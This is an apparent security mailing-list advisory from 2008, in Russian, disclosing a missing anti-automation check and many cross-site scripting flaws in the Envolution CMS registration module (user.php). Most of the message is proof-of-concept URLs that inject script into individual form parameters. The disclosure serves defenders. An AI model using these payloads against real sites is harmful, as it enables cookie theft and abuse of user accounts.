Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

SunShop <= 4.1.4 SQL Injection

Vanilla <= 1.1.4 Script Injection/ XSS

Ovidentia 6.6.5 XSS (index. php)‏

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	19.08.2008
Subject:	Multiple vulnerabilities in Envolution

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною многочисленных уязвимостях в системе
Envolution, в частности Insuficient Anti-automation и Cross-Site Scripting.

Insuficient Anti-automation:

Уязвимость в user.php (в модуле NS-NewUser).

http://websecurity.com.ua/uploads/2008/Envolution%20Insuficient%20Anti-au
tomation.html

Можно как через POST, так и через GET:

http://site/user.
php?uname=test&upass=12345&upassverif=12345&email=test@test.
com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уязвимости в user.php (в модуле NS-NewUser).

http://site/user.
php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E&email=test@test.
com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ea
lert(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealer
t(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealer
t(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Eale
rt(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Eale
rt(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealer
t(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealer
t(document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://site/user.
php?uname=test10&upass=12345&upassverif=12345&email=test10@test.
com&agreetoterms=1&module=NS-
NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E

Уязвима версия Envolution 1.2.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2358/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua